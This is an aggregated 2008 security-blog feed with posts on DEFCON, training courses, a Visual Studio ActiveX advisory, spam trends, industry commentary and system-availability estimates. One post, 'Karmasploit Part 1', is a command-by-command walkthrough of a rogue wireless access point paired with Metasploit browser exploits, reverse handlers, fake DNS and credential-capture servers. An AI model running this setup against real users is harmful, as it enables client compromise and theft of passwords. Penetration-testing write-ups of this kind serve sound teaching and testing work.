Monday, August 18, 2008

Spliced feed for Security Bloggers Network

Spliced feed for Security Bloggers Network

Air Force Cyber Command halted…? [SecuraBit]

Posted: 18 Aug 2008 07:10 AM CDT

So the Air Force, which prides themselves for being the most technical branch of all the armed forces, has decided to suspend its efforts on building their latest Cyber Command. Not sure if any of you recall the latest AF recruitment commercials geared around cyber security, but it would be safe to say that [...]

ShareThis

SANS Mentor SEC 504 in Long Island, NY [Kees Leune]

Posted: 17 Aug 2008 07:31 PM CDT

SANS courses have a reputation as being the best technical vendor-neutral security training available at the moment. I am pleased to announce that I have recently joined the SANS Mentor program, and I am currently preparing to host a SEC 504 Hacker Techniques, Exploits & Incident Handling class. The class prepares the attendees for the GIAC certified incident handler (GCIH) certification.

We are currently looking at starting the class somewhere around Christmas. Mentor classes run for 10 consecutive weeks for two hours a week, usually in the early evening.

If you are interested in taking the class through the Mentor program, and if you are able (and willing) to travel to Long Island (NY) to take the class, please let me know.

Exact dates and times have not yet been determined, so I can work with you on that aspect. For now, we are looking at holding the classes in Garden City, or in Hauppage.

Defcon [Kees Leune]

Posted: 17 Aug 2008 05:44 PM CDT

Defcon was awesome.

I got to meet a whole lot of people who I wanted to say hello to, a whole bunch of people who I had never heard of but enjoyed hanging out with, and I was unable to hook up with some persons who I had really wanted to see. Oh well, there is always next year!

I'm not going in much detail; if you were there you know what it was like and if you weren't, I don't think I would be able to convey the Con as a whole. This picture captures it fairly well though ;)

sheep.jpg


DAVIX 1.0.1 Released [Security Data Visualization]

Posted: 17 Aug 2008 12:44 PM CDT

After months of building and testing, the long anticipated release of DAVIX - The Data Analysis & Visualization Linux® - arrived last week during Blackhat/DEFCON in Las Vegas. It is a very exiting moment for us and we are curious to see how the product is received by audience. So far the ISO image has been downloaded at least 600 times from our main distribution server. Downloads from the mirrors are not accounted.

All those eager to get their hands dirty immediately can find a description as well as the download links for the DAVIX ISO image on the DAVIX homepage.

We wish you happy visualizing!

Kind regards
Jan

An Exploit That Targets Developers [Sunnet Beskerming Security Advisories]

Posted: 17 Aug 2008 11:00 AM CDT

Towards the end of last week a vulnerability affecting Microsoft's Visual Studio was identified in the wild, though it isn't known just how widespread the attacks are at this stage.

While the mechanism of the vulnerability, an ActiveX control buffer overflow leading to remote code execution, isn't exactly new, it is the target (and the fact it is being actively targeted) that makes it somewhat interesting.

In the past there have been proof of concept and limited release vulnerabilities targeting developers, reverse engineers, forensic analysts, and a range of other service providers. What hasn't really happened with any of the previous examples is a move to exploitation in the wild.

Developers who are not able to separate their development environment from the Internet, and who use their development systems to surf the Internet, will be at greatest risk from this particular exploit. With the increasing levels of high quality online development libraries and code samples, it is becoming rarer that developers maintain a clear separation between the two and so the vulnerable userbase is actually quite a high proportion of the total number of Visual Studio installations.

If you have Visual Studio 6 installed and you want to be protected against the vulnerability in the Msmask32.ocx ActiveX Control, either install version 6.0.84.18 (reported to be fixed in this version), or set the killbit for the following CLSID in the Registry :
{C932BA85-4374-101B-A56C-00AA003668DC}.

Spamtastic? Nope, SPAMTACULAR [Vitalsecurity.org - A Revolution is the Solution]

Posted: 17 Aug 2008 10:57 AM CDT



.....and just when you think it can't get any stupider, HERE COMES CHRISTMAS:

The Super Duper Late Edition of The Spywareguide Roundup [Vitalsecurity.org - A Revolution is the Solution]

Posted: 17 Aug 2008 10:48 AM CDT



....oh, all sorts of things, WTF Cat!

For example, this past week we've seen....

* Automated Spim on Microblogging Site Via MSN Messenger - I thought this was a clever way of zinging out automated spim on sites similar to Twitter. Naughty, naughty spammers.

* CNN Spam - There's been all sorts of spam shenanigans going on this past week or so, hasn't there? [1], [2]

* Marketing Bot Allows Insertion of Custom Facebook Feed Messages - I think this is a very bad idea.

* Spamblogs Pushing Rogue Antivirus Programs - Nothing Earth-shaking, but always worth keeping an eye on this kind of thing.

* Trust No One? - An interesting email that's either legit, fake or somewhere inbetween. I'm going to be digging into this one a bit more, hopefully.

* A Dark Knight for Zango - A three part wing-dinger, with thrills, spills and chills!

Also, pirate movies.

Anyway, that's it for this week! If I'm late with the roundup again, may WTF Cat beat me soundly with a wet kipper.

Metasploit + Karma=Karmasploit Part 1 [Carnal0wnage Blog]

Posted: 16 Aug 2008 11:38 PM CDT

HD Moore released some documentation to get karmasploit working with the framework.

First you'll have to get an updated version of aircrack-ng because you'll need airbase-ng. I had 0.9.1 so I had to download and install the current stable version (1.0-rc1). If you have an old version you should be good dependency-wise. Ah, but there is a patch,(I used the 2nd patch), so apply that before you make/make install.

You may also need a current version of madwifi drivers (I used 0.9.4). I recently updated my kernel and that had hosed all my madwifi stuff up, so I had to reinstall. Ok, so got an updated version of aircrack, patched airbase-ng, and madwifi drivers and can inject packets? Let's continue.

Let's do our aireplay-ng test to see if things are working:

root@WPAD:/home/cg# aireplay-ng --test ath40
19:55:44 Trying broadcast probe requests...

19:55:44 Injection is working!

19:55:46 Found 5 APs


19:55:46 Trying directed probe requests...
19:55:46 00:1E:58:33:83:71 - channel: 4 - 'vegaslink'

19:55:52 0/30: 0%


19:55:52 00:14:06:11:42:A2 - channel: 4 - 'VEGAS.com'
19:55:58 0/30: 0%


19:55:58 00:13:19:5F:D1:D0 - channel: 6 - 'stayonline'
19:56:03 Ping (min/avg/max): 20.712ms/26.964ms/31.267ms Power: 14.80

19:56:03 5/30: 16%


19:56:03 00:14:06:11:42:A0 - channel: 4 - 'cheetahnetwork'

19:56:09 0/30: 0%


19:56:09 00:14:06:11:42:A1 - channel: 4 - 'Adult***Vegas'
19:56:15 0/30: 0%


Look's like we are good.

Now just follow the steps in the documentation, I installed dhcpd3 and set up my conf file, I did a svn update on the metasploit trunk, made sure the sqlite3 stuff was working and then tweaked my karma.rc file for the IP address I was on. Pretty straightforward.

With all the config files set up its pretty easy to get things going.

root@WPAD:/home/cg# airbase-ng -P -C 30 -v ath40
02:59:55 Created tap interface at0
02:59:55 Access Point with BSSID 00:19:7E:8E:72:87 started.
02:59:57 Got directed probe request from 00:1B:63:EF:9F:EC - "delonte"
02:59:58 Got broadcast probe request from 00:14:A5:2E:BE:2F
02:59:59 Got directed probe request from 00:1B:63:EF:9F:EC - "delonte"
03:00:02 Got broadcast probe request from 00:90:4B:C1:61:E4
03:00:03 Got directed probe request from 00:1B:63:EF:9F:EC - "delonte"
03:00:05 Got broadcast probe request from 00:14:A5:48:CE:68
03:00:07 Got broadcast probe request from 00:90:4B:EA:54:01
03:00:09 Got directed probe request from 00:1B:63:EF:9F:EC - "delonte"
03:00:12 Got directed probe request from 00:13:E8:A8:B1:93 - "stayonline"
----snip------
03:01:34 Got an auth request from 00:21:06:41:CB:50 (open system)
03:01:34 Client 00:21:06:41:CB:50 associated (unencrypted) to ESSID: "tmobile"
03:04:19 Got an auth request from 00:1B:77:23:0A:72 (open system)
03:04:19 Client 00:1B:77:23:0A:72 associated (unencrypted) to ESSID: "LodgeNet
**You get the idea...


airbase-ng creates an at0 tap so you have to configure it and set the mtu size (all this if from the karmasploit documentation)

root@WPAD:/home/cg/evil/msf3# ifconfig at0 up 172.16.1.207 netmask 255.255.255.0

root@WPAD:/home/cg/evil/msf3# ifconfig at0 mtu 1400

root@WPAD:/home/cg/evil/msf3# ifconfig ath40 mtu 1800

After we get our IP stuff straight we need to tell the dhcpd server which interface to hand out IPs on.

root@WPAD:/home/cg/evil/msf3# dhcpd3 -cf /etc/dhcp3/dhcpd.conf at0

Internet Systems Consortium DHCP Server V3.0.5
Copyright 2004-2006 Internet Systems Consortium.
All rights reserved.
For info, please visit http://www.isc.org/sw/dhcp/
Wrote 4 leases to leases file.
Listening on LPF/at0/00:19:7e:8e:72:87/172.16.1/24
Sending on LPF/at0/00:19:7e:8e:72:87/172.16.1/24
Sending on Socket/fallback/fallback-net


After that we run our karma.rc file within using msfconsole.

root@WPAD:/home/cg/evil/msf3# ./msfconsole -r karma.rc



=[ msf v3.2-release

+ -- --=[ 304 exploits - 124 payloads

+ -- --=[ 18 encoders - 6 nops

=[ 79 aux


resource> load db_sqlite3

[*] Successfully loaded plugin: db_sqlite3

resource> db_create /root/karma.db

[*] The specified database already exists, connecting

[*] Successfully connected to the database

[*] File: /root/karma.db

resource> use auxiliary/server/browser_autopwn

resource> setg AUTOPWN_HOST 172.16.1.207

AUTOPWN_HOST => 172.16.1.207

resource> setg AUTOPWN_PORT 55550

AUTOPWN_PORT => 55550

resource> setg AUTOPWN_URI /ads

AUTOPWN_URI => /ads

resource> set LHOST 172.16.1.207

LHOST => 172.16.1.207

resource> set LPORT 45000

LPORT => 45000

resource> set SRVPORT 55550

SRVPORT => 55550

resource> set URIPATH /ads

URIPATH => /ads

resource> run

[*] Starting exploit modules on host 172.16.1.207...

[*] Started reverse handler

[*] Using URL: http://0.0.0.0:55550/exploit/multi/browser/mozilla_compareto

[*] Local IP: http://127.0.0.1:55550/exploit/multi/browser/mozilla_compareto

[*] Server started.

[*] Started reverse handler

[*] Using URL: http://0.0.0.0:55550/exploit/multi/browser/mozilla_navigatorjava

[*] Local IP: http://127.0.0.1:55550/exploit/multi/browser/mozilla_navigatorjava

[*] Server started.

[*] Started reverse handler

[*] Using URL: http://0.0.0.0:55550/exploit/multi/browser/firefox_queryinterface

[*] Local IP: http://127.0.0.1:55550/exploit/multi/browser/firefox_queryinterface

[*] Server started.

[*] Started reverse handler

[*] Using URL: http://0.0.0.0:55550/exploit/windows/browser/apple_quicktime_rtsp

[*] Local IP: http://127.0.0.1:55550/exploit/windows/browser/apple_quicktime_rtsp

[*] Server started.

[*] Started reverse handler

[*] Using URL: http://0.0.0.0:55550/exploit/windows/browser/novelliprint_getdriversettings
[*] Local IP: http://127.0.0.1:55550/exploit/windows/browser/novelliprint_getdriversettings
[*] Server started.

[*] Started reverse handler

[*] Using URL: http://0.0.0.0:55550/exploit/windows/browser/ms03_020_ie_objecttype

[*] Local IP: http://127.0.0.1:55550/exploit/windows/browser/ms03_020_ie_objecttype

[*] Server started.

[*] Started reverse handler

[*] Using URL: http://0.0.0.0:55550/exploit/windows/browser/ie_createobject

[*] Local IP: http://127.0.0.1:55550/exploit/windows/browser/ie_createobject

[*] Server started.

[*] Started reverse handler

[*] Using URL: http://0.0.0.0:55550/exploit/windows/browser/ms06_067_keyframe

[*] Local IP: http://127.0.0.1:55550/exploit/windows/browser/ms06_067_keyframe

[*] Server started.

[*] Started reverse handler

[*] Using URL: http://0.0.0.0:55550/exploit/windows/browser/ms06_071_xml_core

[*] Local IP: http://127.0.0.1:55550/exploit/windows/browser/ms06_071_xml_core

[*] Server started.

[*] Started reverse handler

[*] Server started.

[*] Using URL: http://0.0.0.0:55550/ads

[*] Local IP: http://127.0.0.1:55550/ads

[*] Server started.

[*] Auxiliary module running as background job

resource> use auxiliary/server/capture/pop3

resource> set SRVPORT 110

SRVPORT => 110

resource> set SSL false

SSL => false

resource> run

[*] Server started.

[*] Auxiliary module running as background job

resource> use auxiliary/server/capture/pop3

resource> set SRVPORT 995

SRVPORT => 995

resource> set SSL true

SSL => true

resource> run

[*] Server started.

[*] Auxiliary module running as background job

resource> use auxiliary/server/capture/ftp

resource> run

[*] Server started.

[*] Auxiliary module running as background job

resource> use auxiliary/server/capture/imap

resource> set SSL false

SSL => false

resource> set SRVPORT 143

SRVPORT => 143

resource> run

[*] Server started.

[*] Auxiliary module running as background job

resource> use auxiliary/server/capture/imap

resource> set SSL true

SSL => true

resource> set SRVPORT 993

SRVPORT => 993

resource> run

[*] Server started.

[*] Auxiliary module running as background job

resource> use auxiliary/server/capture/smtp

resource> set SSL false

SSL => false

resource> set SRVPORT 25

SRVPORT => 25

resource> run

[*] Server started.

[*] Auxiliary module running as background job

resource> use auxiliary/server/capture/smtp

resource> set SSL true

SSL => true

resource> set SRVPORT 465

SRVPORT => 465

resource> run

[*] Server started.

[*] Auxiliary module running as background job

resource> use auxiliary/server/fakedns

resource> unset TARGETHOST

Unsetting TARGETHOST...

resource> set SRVPORT 5353

SRVPORT => 5353

resource> run

[*] Auxiliary module running as background job

resource> use auxiliary/server/fakedns

resource> unset TARGETHOST

Unsetting TARGETHOST...

resource> set SRVPORT 53

SRVPORT => 53

resource> run

[*] Auxiliary module running as background job

resource> use auxiliary/server/capture/http

resource> set SRVPORT 80

SRVPORT => 80

resource> set SSL false

SSL => false

resource> run

[*] Server started.

[*] Auxiliary module running as background job

resource> use auxiliary/server/capture/http

resource> set SRVPORT 8080

SRVPORT => 8080

resource> set SSL false

SSL => false

resource> run

[*] Server started.

[*] Auxiliary module running as background job

resource> use auxiliary/server/capture/http

resource> set SRVPORT 443

SRVPORT => 443

resource> set SSL true

SSL => true

resource> run

[*] Server started.

[*] Auxiliary module running as background job

resource> use auxiliary/server/capture/http

resource> set SRVPORT 8443

SRVPORT => 8443

resource> set SSL true

SSL => true

resource> run

[*] Server started.

[*] Auxiliary module running as background job

msf auxiliary(http) >


Next post we'll see karmasploit in action.

Defcon Thoughts [Carnal0wnage Blog]

Posted: 16 Aug 2008 11:32 PM CDT

Everyone else (g0ne, ncircle, terminal23) is doing their thoughts on Defcon so I figured I would too. I've been waiting on a couple of people to actually post the code they talked about but I'm growing impatient and I guess I can use the release for other posts.

Let's start with the Cons:
-The Badges...oops that sucked...least not getting one when I first paid, the blinky lights were cool. At least mine worked this year.
-The stench...oops that stunk...like rotting corpse bad.
-The Goons...hmmm what to say...I know you have a tough job with crowd control and whatnot but do you really have to talk to everyone like they are assholes? I'm not sure you have a reason to be screaming at 11am Friday morning, save that shit for Sunday.
-The Crowds...sucks...that narrow ass hallway combined with the stench = no fun
-The Talks...I didn't care for most of the talks (maybe I just picked bad), of course there were a few good ones, but props to everyone that submitted a paper and stood up there in front of a ton of people. I think the boss is convinced to do BH next year, everyone I talked to that went to BH was pleased with the talks.

The Pros:
-The Parties...303, hackerpimps, securabit/i-hacker, offensive computing, freakshow, i-sight, core impact, etc
-The People...not the crowds but getting to meet in person people I talk to online all the time...regrets...not making it to the security twits meetup.
-The CTF...I had people explain a to me a little better than last year what the hell is actually going on. Pretty interesting.
-The Guitar Hero competition...fun!
-The Swag...my green/black defcon coffee cup rulez.
-The Twitter(ing)...very cool watch the twits in real time during talks...mvp to jjx for most tweets or twits or whatever they are called.

I'll do a separate post on the talks I thought stood out at Defcon.

Crash Course In Penetration Testing Workshop at Toorcon [Carnal0wnage Blog]

Posted: 15 Aug 2008 08:15 PM CDT

Joe and I will be conducting our Crash Course In Penetration Testing Workshop at Toorcon in September.

http://sandiego.toorcon.org/content/section/4/8/

Description

Instructors: Joseph McCray & Chris Gates
Includes: 250GB 2.5" USB Harddrive preloaded with lab VMWare images

This course will cover some of the newer aspects of pen-testing covering; Open Source Intelligence Gathering with Maltego and other Open Source tools, Scanning, Enumeration, Exploitation (Both remote and client-side) and Post-Exploitation relying heavily on the features included in the Metasploit Framework. We'll discuss our activities from both the Whitebox and Blackbox approach keeping stealth in mind for our Blackbox activities.

Web Application penetration testing will be covered as well with focus on practical exploitation of cross-site scripting (XSS), cross-site request forgery (CSRF), local/remote file includes, and SQL Injection.

The course will come with a complementary USB Harddrive loaded with the lab Virtual Machine images for you to play with so you can continue to hone your skills and learn new techniques even after the course is finished. Attendees will walk away with a current knowledge of how to pen-test both a network and a web application, all of the basic tools needed, and a set of practice exercises that they can use to improve their skills.

SecViz got a new Logo [Security Data Visualization]

Posted: 15 Aug 2008 04:24 PM CDT

Have you noticed? There is a new logo for secviz.org. To be correct this is the first real logo. What was there before wasn't really a logo.



The Daily Incite - August 15, 2008 [Security Incite Rants]

Posted: 15 Aug 2008 08:27 AM CDT

Today's Daily Incite

August 15, 2008 - Volume 3, #69

Good Morning:
I know I harp on the importance of managing expectations frequently, mostly because I keep seeing data points everywhere that reinforce the point. As I continue to binge on the Olympics, the concept continues to resonate. The US Men's Gymnastic team got a Bronze. It was very unexpected, given the injuries to the Hamm brothers. So they are ecstatic. Yet, the women's team was disappointed with the Silver. Why? Expectations. The girls thought they could win after 2 rotations.
Get ready to see the NY Bretts!
Even magical Michael Phelps was pissed off after the 100 butterfly event. He won Gold, set a world record and he's still pissed. Turned out his goggles were leaking, so he was swimming blind. And he still expected to swim faster. Again, expectations.

Now it's time for the NFL season to start. I'm taking the boy to the opening pre-season Falcons game on Saturday, exercising my new season tickets. It's very exciting, even though I expect the Falcons to suck this year. I just love to watch football, even if it's not the NY Giants.

Matt Ryan is poised to step in as the starter and future of the franchise sometime over the season. This year, the expectations are low. Over time, they won't be. But he should enjoy the fact that he can learn this year and not really be raked over the coals when the Falcons make some dumb mistakes and lose some games. It's all about managing expectations.

Brett Favre meanwhile is in exactly the opposite position. The NY Jets want him to come in and have an immediate impact. He's got little wiggle room to learn the system and to be the hyper-aggressive Favre that ends up making as many mistakes as he makes great plays. It's not like NY is a forgiving place. I'm sure the crazy New Yorkers will be jumping Eli when he throws an INT or 10. Super Bowl ring or not, it's always about what have you done lately.

The good news is that you probably don't have millions of fans hanging on your every move. That takes off the immediate pressure and ensures you likely won't be tabloid fodder, but that doesn't mean you shouldn't always be paying attention to expectations. You need to. If you do it wrong, you are certain to disappoint people. If you do it right, you are a super-star. Even if you accomplish exactly the same thing. 

Have a great weekend. And meet those expectations.

Photo: "BRETTS" originally uploaded by nationalparodyleague

Technorati: , , ,

The Pragmatic CSO
The Pragmatic CSO:
Available Now!

Read the Intro and Get
"5 Tips to be a Better CSO"

www.pragmaticcso.com
Get Your Special Report:
6 Easy Steps to Protect Your Identity
and
get access to Security Mike's Portal today

www.securitymike.com

Security Mike's Guide to Internet Security

Top Security News

Don't hold your breath for the demise of passwords
So what? - I've been in this game for a long time. Almost as long as I've been in the game, people have been calling for the end of passwords. And there have been lots of "contenders," positioning to replace the good old fashioned password. It still hasn't happened yet, and I don't expect it to happen anytime soon. This latest discussion by SJSU professor Randall Stross talks about the fact that passwords aren't secure. It's all stuff we've heard before. Widespread use of strong authentication techniques is cost prohibitive and doesn't solve the problems of identity theft or phishing. Personally, I try to eliminate the issues I know can get me. Like a dictionary attack. So I use strong passwords with a password manager (I use 1password) to eliminate the complexity. RoboForm is pretty well regarded on the Windows side. Will a strong password stop a well crafted XSS, MITM or CSRF attack. Nope. But it will stop some basic attacks and I think over time the data has shown that it tends to be the basic that is most successful.
Link to this

Reducing the Fed's attack surface
So what? - Evidently the US Feds have been watching the Weakest Link and figured that maybe it was a bad idea to have 8,000 different connections to the Internet. The initiative is called Trusted Internet Connection (TIC). Clearly the more connections the more places to screw up a configuration and leave a hole. So this idea of reducing the number of connections to about 100 is kind of interesting, but I'm not sure it's feasible. Those would need to be some pretty big ass pipes and there is little room for error. Sure you can throw a lot of money on monitoring and managed services and the like. But if you are wrong, the bad guys get access to not just a small section of the US Fed networks, but large swathes of territory. It's also interesting that the pendulum is swinging back to private networks. It wasn't too long ago that it was all about moving away from private packet services and using branch to branch VPNs to cheapen transport. Now I guess it'll swing back to connecting sites via private network backbones and aggregating the access to only a few points. What's old is new again, though it's funny we are pulling out the bell bottoms of networks due to a security issue.
Link to this

7 years later we're thinking about TLD contingencies
So what? - How the Internet stays up with reasonable uptime continues to amaze me. Especially when I hear about initiatives like the Registry Failure Task Force that are formed in 2001 and just now starting to move forward with an architecture that would provide a bit more resilience into the system. Nothing in how Larry Seltzer describes the plan seems too groundbreaking. You know, who should do what and then who should they tell. They even claim they are going to practice their response. Good luck with that. It's a great idea and I'm pleased that the idea of containing the damage is alive and well from the folks that run the Internet. Ultimately it doubt it'll be any of the current attack vectors that bring the Internet to its knees. But sooner or later something will emerge and we won't be ready, but at least there will be a plan to recover. And that's about the best we can do.
Link to this


The Laundry List

  1. Clear sailing ahead. The TSA takes CLEAR out of the penalty box after the misplaced laptop incident. Now they are going to encrypt laptops. Imagine that. - BTNmag coverage
  2. More from the "I pulled numbers out of my ass" category, Aberdeen says best in class vulnerability and threat management yields 91% marginal ROI. Huh? What is marginal ROI? What is best in class anything? Who cares, I'm sure the vendors are happy. - Aberdeen release
  3. Security Innovation takes a page out of the TruSecure book. When you have a methodology that works, but no one knows what it is, then just call it a "certification," give the customers a piece of paper, and jack up the price twofold and life is good. Fact is, having someone credible like SI say your software security program is up to snuff is a good thing, but the certification angle. Meh. - Security Innovation release
  4. Where is Lenin when you need him? Google announces the KeyCzar, for "simple and safe crypto." I don't think I've ever seen those three words (simple, safe, crypto) together in one sentence. Let's just hope developers don't start shooting off their feet with these safe and simple libraries. - Google Security Blog

Top Blog Postings

He blinded me with science....SCIENCE
Thomas Dolby lives and not just as some wacky podcasting dude. The Mogull brings up a good point in his Dark Reading column about actually having some data regarding vulnerability disclosure. That would be novel. Right now it's very much a he-said, she-said activity. We think it's bad that HD published the DNS attack in Metasploit. But are we sure? Does security by obscurity work? And for how long? These are all very interesting questions, and a topic rife with dissension and opinion. Data would solve the problems. But gathering the data, not so easy. Rich asks you do to a poll, and you should do that. Is that data? Nope. It's opinion. Were you hurt or helped is getting at people's opinion. There are enough folks tracking enough exploits that I think there is probably enough data out there to start drawing some conclusions. But getting there will require a significant amount of sharing and cooperation, which isn't necessarily the strong suit of the security industry.
http://www.darkreading.com/document.asp?doc_id=160415
Link to this

Ding dong, SIM is dead? Yeah, not so much...
I wish everyone would just remember that the security business is like Night of the Living Dead. We can never kill anything off, it just hangs out in the cemetery until some desperate producer decides to roll another zombie movie. So Raffy's first post that SIM is dead was really kind of ridiculous. Thankfully he saw fit to clarify what he's saying in this post, which is SIM is dead - unless... My opinion is that the first generation of SIM didn't do what it needed to. It was too hard, too expensive, took too long to see value. There are lots of folks that are working on those issues. Of course, we still aren't there yet, but the industry is making progress. And the biggest reason I don't see the idea of SIM dying (although the implementation will clearly change and evolve) is because CUSTOMERS NEED IT. Unless someone comes up with some magic fairy dust that all of a sudden tells users what's going on with their systems and what they should be focusing on RIGHT NOW, then we need security management capabilities. But anytime you pronounce something dead it generates lots of page views, eh? 
http://blogs.splunk.com/raffy/2008/07/18/sim-is-dead-unless/
Link to this

Lets start the hype engine for 2009
Stuart King works for a conference producer (amongst many other things that his employer does), so obviously the folks on the "product" side of the house can and should consult him about what's hot in security. I guess it is getting towards the end of 2008, which means we all have to start thinking about topics for 2009. Great. For the 5th year in a row, I suspect 2009 will be very much like 2008. We are still bailing out the leaky boat with a small cup. Sure, there are new and different attack vectors. And things like "the cloud" are causing us to revisit our general security architectures. And compliance certainly isn't going away as a key issue for security folks everywhere. BUT, maybe in 2009 we can start actually implementing the stuff we bought in 2006 and making sure we are more effectively doing the blocking and tackling that we all know can use some improvement. But alas, that isn't too sexy for a conference producer. Do you wonder why most of these folks don't really ask my opinion?
http://www.computerweekly.com/blogs/stuart_king/2008/08/2009securitypredictions.html
Link to this

Crowbar 0.941 [extern blog SensePost;]

Posted: 15 Aug 2008 08:25 AM CDT

Quick update on your favourite brute forcer... The file input "MS EOF char" issue has been resolved, and provision has been made for blank passwords too. The above mentioned error meant that Crowbar incorrectly used EOF characters on *nix based files.

Regarding the blank passwords, simply include the word "[blank]" (without the "") in your brute force file and crowbar will test for blank usernames/passwords as well.

For those of you that don't know, Crowbar is a generic brute force tool used for web applications. It's free, it's light-weight, it's fast, it's kewl :>

Get it at http://www.sensepost.com/research/crowbar/

frankieg

SecuraBit Episode 8 [SecuraBit]

Posted: 15 Aug 2008 06:01 AM CDT

On this Episode of SecuraBit available here! Back from three week hiatus! Defcon and BlackHat Notable Defcon Parties Jay and Chris attended: Core Impact EthicalHacker.net Cisco Isight I-hacked StillSecure and IOActive Freakshow Special thanks to all that allowed us to drink for free Hopefully you got a cool Securabit T-shirt out of it! ChicagoCon: Boot Camps: Oct 27 - 31 Conference: [...]

ShareThis

This posting includes an audio/video/photo media file: Download Now

Estimating Availability of Simple Systems - Non-redundant [Last In - First Out]

Posted: 14 Aug 2008 11:02 PM CDT

 

In the Introductory post to this series, I outlined the basics for estimating the availability of simple systems. This post picks up where the first post left off and attempts to look at availability estimates for non-redundant systems.

Let's go back to the failure estimate chart from the introductory post

Component Failures per Year Hours to Recover Hours Failed per year
WAN Link .5 8 4
Routers, Devices .2 4 .8
SAN Fabric .2 4 .8
SAN LUN .1 12 .12
Server .5 8 4
Power/Cooling 1 2 2

And apply it to a simple stack of three non-redundant devices in series. availability-miscAssuming that the devices are all 'boot from flash and no hard drive' we would apply the estimated failures per year and hours to recover in series for each device from the Routers/Devices row of the table. For series dependencies, where the availability of the stack depends on each of the devices in the stack, simply adding the estimated failures and recovery times together gives us an estimate for the entire stack.

For each device:

.2 failures/year * 4 hours to recover = .8 hours/year unavailability.

For three devices in series, each with approximately the same failure rate and recovery time, the unavailability estimate would be the sum of the unavailability of each component, or .8 + .8 + .8 = 2.4 hours/year.

Notice a critical consideration. The more non-redundant devices you stack up in series, the lower your availability. (Notice I made that sentence in bold and italics. I did that 'cause it's a really important concept.)

The non-redundant series dependencies also apply to other interesting places in a technology stack. For example, if I want my really big server to go faster, I add more memory modules so that the memory bus can stripe the memory access across more modules and spend less time waiting for memory access. Those memory modules are effectively serial, non-redundant. So for a fast server, we'd rather have 16 x 1GB DIMMs than 8 x 2GB DIMMs or 4 x 4GB DIMMs. The server with 16 x 1GB DIMMs will likely go faster than the server with 4 x 4DB DIMMs, but it will be 4 times as likely to have memory failure.

Let's look at a more interesting application stack, again a series of non-redundant components.

We'll assume that this is a T1 from a provider, a router, firewall, switch, application/web server, a database server and attached RAID array. The green path shows the dependencies for a successful user experience. The availability calculation is a simple sum of the product of failure frequency and recovery time of each component.

application-nonredundant
Component Failures per Year Hours to Recover Hours Failed per year
WAN Link 0.5 8 4.0
Router 0.2 4 0.8
Firewall 0.2 4 0.8
Switch 0.1 12 .12
Web Server 0.5 8 4.0
Database Server 0.5 8 4.0
RAID Array 0.1 12 .12
Power/Cooling 1.0 2 2.0
Total     15.8 hours

The estimate for this simple example works out to be about 16 hours of down time per year, not including any application issues, like performance problems, scalability issues.

  • The estimate also doesn't consider the human factor.
  • Because numbers we input into the chart are really rough, with plenty of room for error, the final estimate is also just a guesstimate.
  • The estimate is the average hours of outage over a number of years, not the number of hours of outage for each year. You could have considerable variation from year to year.

Applying the Estimate to the Real World

To apply this to the real world and estimate an availability number for the entire application, you'd have to know more about the application, the organization, and the persons managing the systems.

For example - assume that the application is secure and well written, and that there are no scalability issues, and assume that the application has version control, test, dev and QA implementations and a rigorous change management process. That application might suffer few if any application related outages in a typical year. Figure one bad deployment per year that causes 2 hours of down time. On the other hand, assume that it is poorly designed, that there is no source code control or structured deployment methodology, no test/QA/dev environments, and no change control. I've seen applications like that have a couple hours a week of down time.

And - if you consider the human factor, that the humans in the loop (the keyboard-chair interface) will eventually mis-configure a device, reboot the wrong server, fail to complete a change within the change window, etc., then you need to pad this number to take the humans into consideration.

On to Part Two (or back to the Introduction?)

Estimating Availability of Simple Systems - Redundant [Last In - First Out]

Posted: 14 Aug 2008 11:02 PM CDT

 
This is a continuation of a series of posts that attempt to provide the basics of estimating the availability of various simple systems. The Introduction covered the fundamentals, Part One covered estimating the availability of non-redundant systems. This post will attempt to cover simple redundant systems.
 
Let's go back to the failure estimate chart from the introductory post, but this time modify it for redundant (active/passive) redundancy. Remember that for redundant components, the number of failures is the same (the MTBF doesn't change), but the time to recover (MTTR) is shortened dramatically. The MTTR is no longer the time it takes to determine the cause of the failure and replace the failed part, but rather the MTTR is the time that it takes to fail over to the redundant component.
 
Component Failures per Year Hours to Recover (component) Hours to failover
(redundant)
Hours Failed per year
WAN Link .5 8 .05 .025
Routers, Devices .2 4 .05 .01
SAN Fabric .2 4 .01 .002
SAN LUN .1 12 .12 .12
Server .5 8 .05 .025
Power/Cooling .2 2 0 0

Notice nice small numbers in the far right column. Redundant systems tend to do a nice job of reducing MTTR.

Note that if you believe in complexity and the human factor, you might argue that because they are more complex, redundant systems have more failures. I'm sure this is true, but I haven't considered that for this post (yet). Note also that I consider SAN LUN failure to be the same as for the non-redundant case. I've considered that LUN's are always configured with some for on redundancy, even in the non-redundant scenario.

redundant-application-stack-pathNow apply it to a typical redundant application stack. The stack mixed active/active, active passive. There are differences in failure rates of active/active and active/passive HA pairs, but for this post, the difference is minor enough to ignore. (Half the time, when a active/passive pair has a failure, the passive device is the one that failed, so service is unaffected. Active/active pairs therefor have a service affecting failure twice as often.)

Under normal operation, the green devices are active, and failure of any active device causes an application outage equal to the failover time of the high availability device pair.

 

 

 

 

The estimates for failure frequency and recovery time are:

Component Failures per Year Hours to failover
(MTTR)
Hours Failed per year
WAN Link .5 .05 .025
Router .2 .05 .01
Firewall .2 .05 .01
Load Balancers .2 .05 .01
Switch .2 .05 .01
Web Server .5 .05 .025
Switch .2 .05 .01
Database Server .5 .05 .025
SAN Fabric .2 .01 .002
SAN LUN .1 .12 .12
Power/Cooling 1 0 0
Total     .25 = 15 min

These numbers imply some assumptions about some of the components. For example, in this trivial case, I'm assuming that :

  • The WAN links must not be in the same conduit, or terminate on the same device at the upstream ISP. Otherwise they would not be considered redundant. Also, the WAN links likely will be active/active, so the probability of failure will double.
  • Networks, Layer 3 verses Layer 2. I'll go out on a limb here. In spite of what vendors promise, under most conditions, layer 2 redundancy (i.e. spanning tree managed link redundancy) does not have higher availability than a similarly designed network with layer 3 redundancy (routing protocols). My experience is that the phrase 'friends don't let friends run spanning tree' is true, and that the advantages gained by the link redundancy provided by layer 2 designs are outweighed by the increased probability of spanning tree loop related network failure.
  • Power failures are assumed to be covered by battery/generator. But many hosting facilities still have service affecting power/cooling failures. If I were presenting theses numbers to a client, I'd factor in power and cooling somehow, perhaps by guesstimating a hour or so per year, depending on the facility

These numbers look pretty good, but don't start jumping up and down yet.

